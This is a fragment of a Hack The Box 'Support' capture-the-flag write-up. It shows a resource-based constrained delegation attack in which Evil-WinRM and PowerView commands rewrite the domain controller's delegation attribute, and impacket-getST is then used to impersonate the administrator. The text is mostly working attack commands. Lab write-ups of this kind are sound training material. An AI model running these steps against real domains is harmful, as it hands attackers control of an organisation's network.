Rogue-1/HTB/FullPWN/Support.md

 *Evil-WinRM* PS C:\temp>
 ```

+With our sid in hand add it into the next command string to create a new raw security descriptor.
+Then we set the new bytes to the dc.

 ```console
 *Evil-WinRM* PS C:\temp> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5603)"
 *Evil-WinRM* PS C:\temp> $SDBytes = New-Object byte[] ($SD.BinaryLength)
 *Evil-WinRM* PS C:\temp> $SD.GetBinaryForm($SDBytes, 0)
 *Evil-WinRM* PS C:\temp> Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
 ```
+On our host: by inputting the following command we can create a new ticket and impersonate the administrator.

 ```
 └──╼ [★]$ impacket-getST support.htb/rogue:pass -dc-ip 10.129.53.172 -impersonate administrator -spn www/dc.support.htb